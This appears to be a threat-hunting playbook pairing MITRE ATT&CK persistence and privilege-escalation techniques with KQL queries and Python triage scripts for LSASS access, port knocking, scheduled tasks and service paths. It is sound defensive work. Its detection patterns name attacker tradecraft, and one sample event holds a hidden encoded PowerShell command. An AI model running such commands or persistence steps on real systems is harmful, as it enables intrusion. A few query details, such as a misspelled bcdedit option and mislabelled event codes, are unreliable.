event.type: ("start" OR "process_started") AND process.name: "wmic.exe" AND process.args: "create" AND process.args: ("ActiveScriptEventConsumer" OR "CommandLineEventConsumer")
T1547.001

Boot/Logon Autostart: Registry Run Keys / Startup Folder

[MITRE]
KQLRegistry Run key modifications - common persistence locations
event.code: (4657 OR 4670)
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
InfoStartup folder paths for current user and all users
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
T1547.005

Security Support Provider

[MITRE]
KQLSSP registry key modifications - new SSPs loaded at next boot
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages"
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages"
event.code: (4657 OR 4688) AND process.command_line: (*reg.exe* AND *Lsa*)
T1543.003

Create or Modify System Process: Windows Service

[MITRE]
KQLCobalt Strike persistence - registers itself as Windows service via storesyncsvc.dll
storesyncsvc.dll
T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

[MITRE]
KQLUntrusted DLLs being loaded by common executables
(event.category: "library" OR (event.category: "process" AND event.action: "Image loaded*")) AND dll.name: ("wlbsctrl.dll" OR "wbemcomn.dll" OR "WptsExtensions.dll" OR "wow64log.dll" OR "WindowsCoreDeviceInfo.dll" OR "Ualapi.dll" OR "wlanhlp.dll" OR "phoneinfo.dll" OR "EdgeGdi.dll" OR "cdpsgshims.dll") AND (dll.code_signature.trusted: false OR dll.code_signature.exists: false)
KQLOffice/browser apps writing DLLs to AppData (DLL planting)
Image: (*\\winword.exe OR *\\excel.exe OR *\\powerpnt.exe OR *\\cmd.exe OR *\\certutil.exe OR *\\mshta.exe OR *\\curl.exe OR *\\powershell.exe OR *\\pwsh.exe) AND TargetFilename: *.dll AND TargetFilename: (*\\Users\\* AND *\\AppData\\*)
T1037.001

Boot/Logon Init Scripts: Logon Script (Windows)

[MITRE]
Adversaries set a logon script via the UserInitMprLogonScript registry key to execute code whenever a user logs on, achieving persistence under the user's context.
KQLRegistry access/modification to UserInitMprLogonScript key
event.code: (4657 OR 4656) AND registry.path: *UserInitMprLogonScript*
KQLreg.exe or Sysmon registry events touching logon script key
process.name: reg.exe AND process.command_line: *UserInitMprLogonScript*
event.code: (12 OR 13 OR 14) AND winlog.event_data.TargetObject: *UserInitMprLogonScript*
T1053.005

Scheduled Task/Job: Scheduled Task

[MITRE]
Adversaries create scheduled tasks to maintain persistence; tasks execute at login, system start, or at intervals. Often configured to run as SYSTEM for elevated access.
KQLschtasks.exe execution - inspect parent, working dir, output, user context
process.name: schtasks.exe
event.code: 4698
-- 4698: Scheduled task created - check task XML for Run As user and action
T1671

Cloud Application Integration

[MITRE]
Adversaries maintain cloud persistence by granting malicious OAuth applications access to user data (Consent Phishing). Even after password resets, the OAuth token retains API access to email, files, and other resources.
KQLAzure AD - OAuth consent grants and high-privilege app roles
event.dataset: "azure.auditlogs" AND event.action: ("Consent to application" OR "Add app role assignment to service principal" OR "Add service principal")
T1554

Compromise Host Software Binary

[MITRE]
Adversaries modify or patch legitimate software binaries (backdooring sshd, common system executables) to embed persistence mechanisms directly into trusted software that survives reinstalls.
KQLAuditbeat FIM - modifications to critical native binaries or PAM modules
event.module: "file_integrity" AND event.action: ("attributes_modified" OR "created" OR "updated") AND file.path: ("/usr/sbin/sshd" OR "/bin/login" OR "/lib/security/pam_unix.so")
T1668

Exclusive Control

[MITRE]
Adversaries lock files or resources exclusively to prevent defenders, AV, or EDR from reading, analyzing, or deleting malicious persistence mechanisms.
KQLEDR - processes acquiring exclusive file locks to prevent deletion
event.category: "file" AND event.action: "file_lock" AND process.name: ("powershell.exe" OR "cmd.exe" OR "*.tmp.exe")
T1133

External Remote Services (Persistence)

[MITRE]
For persistence, adversaries install stealthy remote access tools (Ngrok tunnels, AnyDesk, unauthorized VPN agents) or enable RDP on compromised systems to guarantee re-entry from the internet if their primary C2 is blocked.
KQLSysmon - RMM tools used as persistent backdoors
process.name: ("ngrok.exe" OR "AnyDesk.exe" OR "TeamViewer_Service.exe" OR "screenconnect.exe" OR "meshagent.exe")
ArkimePersistent outbound tunnels to RMM infrastructure
tls.handshake.extensions_server_name contains "ngrok.io" OR dns.qry.name contains "anydesk.com"
T1525

Implant Internal Image

[MITRE]
Adversaries backdoor golden images, VM templates, or container base images so every newly deployed server is instantly compromised: persistence that survives reimages and auto-scaling events.
KQLCloudTrail - unauthorized AMI modification or registration
event.dataset: "aws.cloudtrail" AND event.action: ("ModifyImageAttribute" OR "RegisterImage" OR "CreateImage") AND NOT user.name: "*automation-role*"
T1556

Modify Authentication Process

[MITRE]
Adversaries patch authentication mechanisms (Windows LSASS, Linux PAM, Skeleton Key malware on DCs) to accept a backdoor password for any account, enabling login as any user without knowing their real password.
KQLSysmon - suspicious access/injection into LSASS
winlog.event_id: (10 OR 8) AND winlog.event_data.TargetImage: "*\\lsass.exe" AND NOT process.executable: ("*\\System32\\svchost.exe" OR "*\\Antivirus.exe")
KQLLinux FIM - PAM module modifications
event.module: "file_integrity" AND event.action: ("updated" OR "created") AND file.path: "/etc/pam.d/*"
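The LSASS query above keys on Sysmon events 10 and 8 but leaves the GrantedAccess mask untriaged, and the Process Injection card later on this page lists raw mask values. The following is an added example, not the playbook's own code: it decodes a GrantedAccess hex mask into the documented PROCESS_* rights and rates an event 10 against LSASS by whether the caller asked for memory rights and whether its full image path is one of the system processes that normally open LSASS (the allowlist and the sample events are constructed assumptions; tune the allowlist to your fleet).

```python
"""Decode Sysmon event 10 GrantedAccess masks and rate LSASS handle opens.

Added example, not the playbook's code. The rights table holds the documented
PROCESS_* access-right values; sample events and the allowlist are constructed.
"""

PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
# Rights that let the caller read or tamper with LSASS memory (credential theft).
MEMORY_RIGHTS = {"PROCESS_VM_READ", "PROCESS_VM_WRITE", "PROCESS_VM_OPERATION",
                 "PROCESS_CREATE_THREAD", "PROCESS_DUP_HANDLE"}
# Full paths, not bare names: a copy of svchost.exe in a user directory must not pass.
EXPECTED_LSASS_CLIENTS = {          # assumption: extend from your own baseline
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\services.exe",
    "c:\\windows\\system32\\svchost.exe",
}


def decode_granted_access(mask: str) -> list[str]:
    """Turn a GrantedAccess value such as "0x1010" into right names."""
    value = int(mask, 16)
    if value == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    names = [name for bit, name in PROCESS_RIGHTS.items() if value & bit]
    leftover = value & ~sum(PROCESS_RIGHTS)       # bits the table does not name
    if leftover:
        names.append(f"UNKNOWN_{leftover:#x}")
    return names


def assess_lsass_access(event: dict) -> dict:
    """Rate one Sysmon event 10 (ECS/Winlogbeat shape) whose TargetImage is lsass.exe."""
    d = event["winlog"]["event_data"]
    rights = decode_granted_access(d["GrantedAccess"])
    source = d["SourceImage"].lower()
    wants_memory = "PROCESS_ALL_ACCESS" in rights or bool(MEMORY_RIGHTS & set(rights))
    if not d["TargetImage"].lower().endswith("\\lsass.exe"):
        level = "n/a"
    elif wants_memory and source not in EXPECTED_LSASS_CLIENTS:
        level = "high"        # memory rights from something that never needs them
    elif source in EXPECTED_LSASS_CLIENTS:
        level = "info"
    else:
        level = "low"         # unexpected caller, but only query rights
    return {"source": d["SourceImage"], "rights": rights, "level": level}


LSASS = "C:\\Windows\\system32\\lsass.exe"
SAMPLE_EVENTS = [   # constructed Sysmon event 10 records
    {"winlog": {"event_id": 10, "event_data": {"SourceImage": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\dump.exe",
                                              "TargetImage": LSASS, "GrantedAccess": "0x1010"}}},
    {"winlog": {"event_id": 10, "event_data": {"SourceImage": "C:\\Windows\\System32\\svchost.exe",
                                              "TargetImage": LSASS, "GrantedAccess": "0x1000"}}},
    {"winlog": {"event_id": 10, "event_data": {"SourceImage": "C:\\Users\\Public\\svchost.exe",
                                              "TargetImage": LSASS, "GrantedAccess": "0x1fffff"}}},
    {"winlog": {"event_id": 10, "event_data": {"SourceImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
                                              "TargetImage": LSASS, "GrantedAccess": "0x1000"}}},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(assess_lsass_access(ev))
```

The third sample is the case the name-only exclusion in the card's query would miss: an executable called svchost.exe running from a user-writable path. Masks such as 0x1010 and 0x1410 (query plus VM_READ) are the typical shape of a memory read; 0x1000 alone is ubiquitous and mostly benign.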
T1112

Modify Registry (Persistence)

[MITRE]
Adversaries abuse the Windows Registry to store fileless payloads, configure autorun entries, or disable security tools, enabling persistence that survives reboots without writing files to disk.
KQLSysmon - registry modifications to Run keys or security policy
process.name: ("reg.exe" OR "powershell.exe") AND process.command_line: ("* add *" OR "*Set-ItemProperty*") AND process.command_line: ("*CurrentVersion\\Run*" OR "*Windows Defender*")
T1137

Office Application Startup

[MITRE]
Adversaries leverage Office startup features (modifying Normal.dotm, installing XLL/WLL add-ins, or creating Outlook rules) to execute malware every time a user opens Word, Excel, or Outlook.
KQLSysmon - files written to Office Add-in or Startup directories
winlog.event_id: 11 AND file.path: ("*\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" OR "*\\AppData\\Roaming\\Microsoft\\AddIns\\*") AND file.extension: ("dotm" OR "wll" OR "xll" OR "xla")
KQLSysmon Registry - malicious Outlook rules
winlog.event_id: (12 OR 13) AND registry.path: "*\\Software\\Microsoft\\Office\\*\\Outlook\\Profiles\\*\\Rule*"
T1653

Power Settings

[MITRE]
Adversaries modify power settings to prevent sleep/hibernation, ensuring persistent C2 connections are never interrupted by power-saving modes that would drop network connections.
KQLSysmon - powercfg disabling sleep or hibernate
process.name: "powercfg.exe" AND process.command_line: ("* /change *" OR "* -x *") AND process.command_line: ("*standby-timeout-ac 0*" OR "*hibernate-timeout-ac 0*")
T1542

Pre-OS Boot

[MITRE]
Adversaries infect BIOS/UEFI/Boot Records (Bootkits) to persist below the OS, executing before the OS loads, bypassing AV/EDR, and surviving complete OS reinstalls or hard drive wipes.
KQLSysmon - EFI partition mounting (bootkit staging)
process.name: "mountvol.exe" AND process.command_line: "* /S"
KQLSysmon - BCD modifications to disable Driver Signature Enforcement
process.name: "bcdedit.exe" AND process.command_line: ("*set loadoptions DDISABLE_INTEGRITY_CHECKS*" OR "*set testsigning on*")
T1176

Browser Extensions

[MITRE]
Adversaries deploy malicious browser extensions (Chrome, Edge, Firefox) to persist inside the browser, enabling session cookie theft, MFA bypass, webmail reading, or script injection into trusted websites.
KQLSysmon - browsers launched with --load-extension flag
process.name: ("chrome.exe" OR "msedge.exe") AND process.command_line: "*--load-extension=*"
KQLSysmon - unknown extension manifest.json dropped to browser extension dir
winlog.event_id: 11 AND file.path: "*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*" AND file.name: "manifest.json"
T1205

Traffic Signaling

[MITRE]
Adversaries use Port Knocking or Magic Packets: the backdoor stays completely silent until it receives a secret sequence of packets, then opens a port or initiates C2, making it invisible to port scanners.
KQLLinux - BPF/raw socket listeners on endpoints
process.name: ("tcpdump" OR "bpftool") AND NOT user.name: "root"
ArkimePort knocking - rapid SYN packets to non-listening ports
(tcp.flags.syn == 1 AND tcp.flags.ack == 0) AND tcp.dstport > 10000
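The packet filter above isolates the SYN half of a knock; the sequence itself only shows up when SYNs from one source to several unanswered high ports on one destination are grouped in time. The following is an added example, not the playbook's code, that applies that grouping to exported flow records. It assumes records of the form (timestamp, src, dst, src_port, dst_port, flags), where flags is a string such as "S" or "SA"; the records below are constructed. A SYN that was answered with a SYN-ACK is dropped from the candidate set, which is what separates a knock on closed ports from an ordinary connection to a listening high port.

```python
"""Detect port-knock sequences in flow records (T1205).

Added example, not the playbook's own code. Records are constructed; the tuple
shape is an assumption about what you export from Arkime or a flow log.
"""
from collections import defaultdict


def detect_port_knocks(records, min_ports=3, window_s=5.0, high_port=10000):
    """Flag a source that SYNs >= min_ports distinct unanswered ports >= high_port
    on one destination within window_s seconds."""
    answered = set()            # (server, server_port, client) that sent a SYN-ACK
    syns = defaultdict(list)    # (client, server) -> [(ts, dst_port)]
    for ts, src, dst, sport, dport, flags in records:
        if "S" in flags and "A" in flags:
            answered.add((src, sport, dst))
        elif "S" in flags and dport >= high_port:
            syns[(src, dst)].append((ts, dport))

    alerts = []
    for (src, dst), events in syns.items():
        # keep only SYNs that never got a SYN-ACK back from that port
        events = sorted((ts, p) for ts, p in events if (dst, p, src) not in answered)
        i = 0
        for j in range(len(events)):               # sliding time window
            while events[j][0] - events[i][0] > window_s:
                i += 1
            ports = list(dict.fromkeys(p for _, p in events[i:j + 1]))
            if len(ports) >= min_ports:
                alerts.append({"src": src, "dst": dst, "ports": ports,
                               "span_s": round(events[j][0] - events[i][0], 3)})
                break                               # one alert per source/dest pair
    return alerts


SAMPLE_RECORDS = [   # constructed: epoch seconds, src, dst, src_port, dst_port, flags
    # knock sequence: three SYNs to closed high ports, nothing comes back
    (1000.0, "10.1.1.5", "10.1.1.20", 51000, 12001, "S"),
    (1000.4, "10.1.1.5", "10.1.1.20", 51001, 12002, "S"),
    (1000.9, "10.1.1.5", "10.1.1.20", 51002, 12003, "S"),
    # ordinary connection to a listening high port: SYN, then SYN-ACK from the server
    (1001.0, "10.1.1.6", "10.1.1.20", 52000, 18443, "S"),
    (1001.0, "10.1.1.20", "10.1.1.6", 18443, 52000, "SA"),
    # two unanswered SYNs only: below the threshold
    (1002.0, "10.1.1.7", "10.1.1.20", 53000, 20001, "S"),
    (1002.3, "10.1.1.7", "10.1.1.20", 53001, 20002, "S"),
    # the same three ports, but 30 s apart: outside the default window
    (1100.0, "10.1.1.8", "10.1.1.20", 54000, 12001, "S"),
    (1130.0, "10.1.1.8", "10.1.1.20", 54001, 12002, "S"),
    (1160.0, "10.1.1.8", "10.1.1.20", 54002, 12003, "S"),
]

if __name__ == "__main__":
    for alert in detect_port_knocks(SAMPLE_RECORDS):
        print(alert)
```

A port scan trips the same logic, so treat the alert as a pivot: a knock is a short, fixed sequence that repeats from the same source, often followed a few seconds later by a successful connection to a port that was closed before. Widening `window_s` catches slow knocks at the cost of more scan noise.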
T1078

Valid Accounts (Persistence)

[MITRE]
For persistence, adversaries reset dormant account passwords, set passwords to never expire, enable disabled accounts, or generate long-lived cloud API keys to ensure continued access even after incident response.
KQLWindows - disabled accounts re-enabled or password-never-expires set
winlog.event_id: 4722 OR (winlog.event_id: 4738 AND winlog.event_data.UserAccountControl: "*Password Never Expires*")
-- 4722: account enabled. 4738 logs UserAccountControl as %%-codes (%%2089 for 'Don't Expire Password' - Enabled); match whatever form your parser writes
KQLCloudTrail - persistent IAM access key creation
event.dataset: "aws.cloudtrail" AND event.action: "CreateAccessKey"
Privilege Escalation TA0004
Techniques adversaries use to gain higher-level permissions on a system or network. Often uses the same mechanisms as Persistence.
T1055

Process Injection

[MITRE]
KQLEXE/DLL access, creation, or installation events linked to injection
event.type: ("access" OR "creation" OR "installation") AND file.extension: ("exe" OR "dll") AND event.code: ("7" OR "3" OR "560")
  Code 7: Process Creation | Code 3: File Creation | Code 560: Object Access
T1546.010

Event Triggered Execution: AppInit DLLs

[MITRE]
KQLAppInit_DLLs registry key modification
registry.path: ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls" OR "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls") AND NOT process.executable: ("C:\\Windows\\System32\\msiexec.exe" OR "C:\\Windows\\SysWOW64\\msiexec.exe")
registry.path: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs"
RegCreateKeyEx OR RegSetValueEx
KQLProcess creation following AppInit DLL load
event.code: 4688
T1547.009

Shortcut Modification

[MITRE]
KQLLNK file creation or modification, registry changes to .lnk file extension
event.code: (4656 OR 4663)   -- File creation / object access
event.code: 4657 AND registry.path: "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.lnk"
T1548.002

Abuse Elevation Control: Bypass UAC

[MITRE]
KQLeventvwr.exe UAC bypass - check related user and hostname
process.name: eventvwr.exe AND registry.key: "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"
process.name: sdclt.exe AND registry.key: "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"
KQLMSI spawning cmd/powershell (UAC bypass via installer)
event.code: 1 AND process.name: (cmd.exe OR powershell.exe OR pwsh.exe) AND process.parent.name: (*Installer* AND *msi* AND *tmp)
T1037.001

Boot/Logon Init Scripts: Logon Script (Windows)

[MITRE]
KQLRegistry path for logon script (UserInitMprLogonScript)
event.code: (4657 OR 4656) AND registry.path: *\\Environment\\UserInitMprLogonScript
process.name: reg.exe AND process.command_line: *UserInitMprLogonScript*
T1098

Account Manipulation (Privilege Escalation)

[MITRE]
KQLAccount modification event IDs - user changed, group membership changes
event.code: (4738 OR 4728)
  4738: User account changed | 4728: Member added to security-enabled global group
T1053

Scheduled Task/Job

[MITRE]
Adversaries abuse task scheduling to execute malicious code as a higher-privileged user. Scheduled tasks can run as SYSTEM or other elevated accounts, granting privilege escalation.
KQLScheduled task creation - check user context for privilege escalation (running as SYSTEM)
process.name: schtasks.exe AND process.command_line: */create*
event.code: 4698
-- Verify: is the task configured to run as NT AUTHORITY\SYSTEM or other elevated account?
KQLTaskScheduler process creation with create/change/delete args
event.type: "process_start" AND process.name: "TaskScheduler.exe" AND process.command_line: (* /Create * OR * /Change * OR * /Delete *)
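Both scheduled-task cards (persistence above, and this privilege-escalation one) end at the same pivot: open the 4698 event and read the task XML for the Run As principal and the action. The following is an added example, not the playbook's code, that does that reading programmatically. It parses the TaskContent XML that Security event 4698 carries and returns the reasons a task deserves attention: a privileged principal, an action outside trusted directories, a script host as the action, or a hidden task. The two TaskContent samples and the trusted-directory list are constructed assumptions; the element names follow the Task Scheduler XML schema.

```python
"""Parse and assess the TaskContent XML carried by Security event 4698.

Added example, not the playbook's own code. Both TaskContent samples below are
constructed; element names follow the Task Scheduler XML schema that 4698 logs.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
PRIVILEGED_SIDS = {"S-1-5-18": "SYSTEM", "S-1-5-19": "LOCAL SERVICE", "S-1-5-20": "NETWORK SERVICE"}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# TaskContent begins with an encoding="UTF-16" declaration; once the event is a
# Python str that declaration makes expat reject the input, so strip it first.
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")


def parse_task_content(task_content: str) -> dict:
    """Pull the fields a triage needs out of the 4698 TaskContent XML."""
    root = ET.fromstring(XML_DECL_RE.sub("", task_content, count=1))
    principal = root.find("t:Principals/t:Principal", NS)
    triggers = root.find("t:Triggers", NS)

    def ptext(tag: str) -> str:
        return "" if principal is None else principal.findtext(f"t:{tag}", default="", namespaces=NS)

    return {
        "author": root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS),
        "user_id": ptext("UserId"),
        "logon_type": ptext("LogonType"),
        "run_level": ptext("RunLevel"),
        "hidden": root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS).strip().lower() == "true",
        "triggers": [] if triggers is None else [t.tag.split("}")[-1] for t in triggers],
        "actions": [{"command": e.findtext("t:Command", default="", namespaces=NS),
                     "arguments": e.findtext("t:Arguments", default="", namespaces=NS)}
                    for e in root.findall("t:Actions/t:Exec", NS)],
    }


def assess_task(task: dict) -> list[str]:
    """Reasons the task deserves a look; an empty list means nothing stood out."""
    reasons = []
    uid = task["user_id"].strip().upper()
    if uid in PRIVILEGED_SIDS or uid.endswith("SYSTEM"):
        reasons.append(f"runs as {PRIVILEGED_SIDS.get(uid, uid)}")
    elif task["run_level"] == "HighestAvailable":
        reasons.append("requests highest available privileges")
    for action in task["actions"]:
        cmd = action["command"].strip().strip('"').lower()
        cmd = cmd.replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")
        if not cmd.startswith(TRUSTED_DIRS):
            reasons.append(f"action outside trusted directories: {action['command']}")
        if cmd.rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            reasons.append("action is a script host or interpreter")
    if task["hidden"]:
        reasons.append("task is hidden")
    return reasons


SUSPICIOUS_TASKCONTENT = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>WS-042\jdoe</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\Users\Public\update.exe</Command><Arguments>/silent</Arguments></Exec></Actions>
</Task>"""

BENIGN_TASKCONTENT = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>WS-042\jdoe</UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>"C:\Program Files\Vendor\Updater.exe"</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for sample in (SUSPICIOUS_TASKCONTENT, BENIGN_TASKCONTENT):
        task = parse_task_content(sample)
        print(task["user_id"], task["actions"], assess_task(task))
```

Feed it `winlog.event_data.TaskContent` from the 4698 event; a SYSTEM principal by itself is common for vendor tasks, so it is the combination with an action outside trusted directories or a hidden flag that makes a task worth the pivot.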
T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

[MITRE]
Adversaries place malicious DLLs in directories searched before the legitimate DLL location, causing privileged processes to load attacker-controlled code and elevate privileges.
KQLUnsigned or untrusted DLL load of commonly hijacked DLL names
(event.category: "library" OR (event.category: "process" AND event.action: "Image loaded*")) AND
(dll.name: ("wlbsctrl.dll" OR "wbemcomn.dll" OR "WptsExtensions.dll" OR "wow64log.dll" OR
            "WindowsCoreDeviceInfo.dll" OR "Ualapi.dll" OR "wlanhlp.dll" OR "phoneinfo.dll" OR
            "EdgeGdi.dll" OR "cdpsgshims.dll" OR "diagtrack_win.dll") AND
 (dll.code_signature.trusted: false OR dll.code_signature.exists: false))
T1134

Access Token Manipulation

[MITRE]
Adversaries steal, duplicate, or impersonate Windows access tokens of higher-privileged processes (SYSTEM, Domain Admin) using tools like Cobalt Strike's make_token or Incognito, gaining elevated access without needing a password.
KQLWindows - Logon Type 9 (NewCredentials) used for token impersonation
winlog.event_id: 4624 AND winlog.logon.type: 9 AND event.outcome: "success"
T1543

Create or Modify System Process (Privilege Escalation)

[MITRE]
When a vulnerable service runs as SYSTEM, adversaries replace its binary or modify its binPath. On restart, their malware executes as SYSTEM, achieving privilege escalation via DLL hijacking or service misconfiguration.
KQLWindows - sc.exe modifying existing service binary path
process.name: ("sc.exe" OR "powershell.exe") AND process.command_line: "* config *" AND process.command_line: "* binPath= *"
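The System Services card in the Execution section (sc.exe create / event 7045 with a suspicious binPath) and this card (sc.exe config binPath=) are two views of the same question: does the image path a service will run point somewhere a real service should not? The following is an added example, not the playbook's code, that runs both hunts over ECS/Winlogbeat-shaped events. It extracts the binPath from sc.exe command lines, takes ImagePath from 7045, expands the %SystemRoot% style variables 7045 logs unexpanded, and returns the reasons each image is suspicious. The trusted-directory list and the sample events are constructed assumptions; it goes a step beyond the cards' "not Program Files" exclusion by also flagging interpreters and encoded PowerShell inside the image path.

```python
"""Triage Windows service creation/reconfiguration for T1569.002 and T1543.003.

Added example, not the playbook's own code. Events use ECS/Winlogbeat-style
field names; the sample events and trusted-directory list are constructed.
"""
import re

# Directories a legitimately installed service image is normally loaded from.
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
# An interpreter in the image path usually means a one-shot command was registered
# as a service (PsExec-style execution) rather than a real service binary.
INTERPRETERS = ("%comspec%", "cmd.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe")
# 7045 logs ImagePath unexpanded; expand the variables the trusted list needs.
ENV_EXPANSIONS = {
    "%systemroot%": "c:\\windows",
    "%windir%": "c:\\windows",
    "%programfiles%": "c:\\program files",
}
USER_WRITABLE_RE = re.compile(r"\\(temp|appdata|programdata|users\\public)\\")
ENCODED_PS_RE = re.compile(r"\s-(e|ec|en|enc|encodedcommand)\s")
# binPath= value of "sc create" / "sc config", quoted or bare.
SC_BINPATH_RE = re.compile(r"\b(create|config)\b.*?\bbinpath=\s*(?:\"([^\"]*)\"|(\S+))",
                           re.IGNORECASE)


def normalise_image_path(image_path: str) -> str:
    """Lower-case, strip surrounding quotes, expand the common %VARS%."""
    p = image_path.strip().strip('"').lower()
    for var, value in ENV_EXPANSIONS.items():
        p = p.replace(var, value)
    return p


def service_image_findings(image_path: str) -> list[str]:
    """Reasons an image path looks suspicious; an empty list means benign."""
    p = normalise_image_path(image_path)
    findings = []
    if not p.startswith(TRUSTED_PREFIXES):
        findings.append("image outside trusted directories")
    if any(tok in p for tok in INTERPRETERS):
        findings.append("interpreter in image path")
    if USER_WRITABLE_RE.search(p):
        findings.append("user-writable directory")
    if ENCODED_PS_RE.search(p):
        findings.append("encoded PowerShell")
    return findings


def sc_binpath(command_line: str):
    """(verb, binPath) from an sc.exe create/config command line, else None."""
    m = SC_BINPATH_RE.search(command_line)
    if not m:
        return None
    return m.group(1).lower(), (m.group(2) or m.group(3))


def triage_service_events(events: list[dict]) -> list[dict]:
    """Run both hunts (7045 ImagePath, sc.exe binPath=) over a list of events."""
    hits = []
    for ev in events:
        winlog = ev.get("winlog", {})
        proc = ev.get("process", {})
        if winlog.get("event_id") == 7045:                    # System log: service installed
            image = winlog["event_data"]["ImagePath"]
            source = "7045 " + winlog["event_data"]["ServiceName"]
        elif proc.get("name", "").lower() == "sc.exe":        # sc.exe create/config binPath=
            parsed = sc_binpath(proc.get("command_line", ""))
            if parsed is None:
                continue
            source, image = "sc " + parsed[0], parsed[1]
        else:
            continue
        findings = service_image_findings(image)
        if findings:
            hits.append({"host": ev["host"]["name"], "source": source,
                         "image": image, "findings": findings})
    return hits


SAMPLE_EVENTS = [   # constructed
    {"host": {"name": "WS-042"}, "winlog": {"event_id": 7045, "event_data": {
        "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}}},
    {"host": {"name": "WS-042"}, "winlog": {"event_id": 7045, "event_data": {
        "ServiceName": "bfdea", "ImagePath": "%COMSPEC% /c powershell.exe -nop -w hidden -e SQBFAFgA"}}},
    {"host": {"name": "WS-042"}, "process": {"name": "sc.exe",
        "command_line": 'sc.exe create UpdaterSvc binPath= "C:\\Users\\Public\\updater.exe" start= auto'}},
    {"host": {"name": "SRV-01"}, "process": {"name": "sc.exe",
        "command_line": "sc.exe config Spooler binPath= C:\\ProgramData\\svc\\svc.exe"}},
    {"host": {"name": "SRV-01"}, "process": {"name": "sc.exe", "command_line": "sc.exe query wuauserv"}},
    {"host": {"name": "SRV-01"}, "winlog": {"event_id": 7045, "event_data": {
        "ServiceName": "VendorAgent", "ImagePath": "\"C:\\Program Files\\Vendor\\agent.exe\""}}},
]

if __name__ == "__main__":
    for hit in triage_service_events(SAMPLE_EVENTS):
        print(hit)
```

The first sample is what PsExec leaves in the System log (a service image directly under %SystemRoot%), the second is the one-shot command shape, and the last two are the noise a "not Program Files" filter alone would still surface or miss.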
T1484

Domain or Tenant Policy Modification

[MITRE]
Adversaries escalate across entire domains by modifying GPOs to push local admin accounts to all workstations, or modify Azure AD Conditional Access policies to exclude backdoor accounts from MFA.
KQLWindows - GPO modifications on Domain Controller SYSVOL
winlog.event_id: 5145 AND winlog.event_data.ShareName: "*\\SYSVOL*" AND winlog.event_data.RelativeTargetName: "*\\Policies\\*\\GPT.ini" AND winlog.event_data.AccessMask: "0x2"
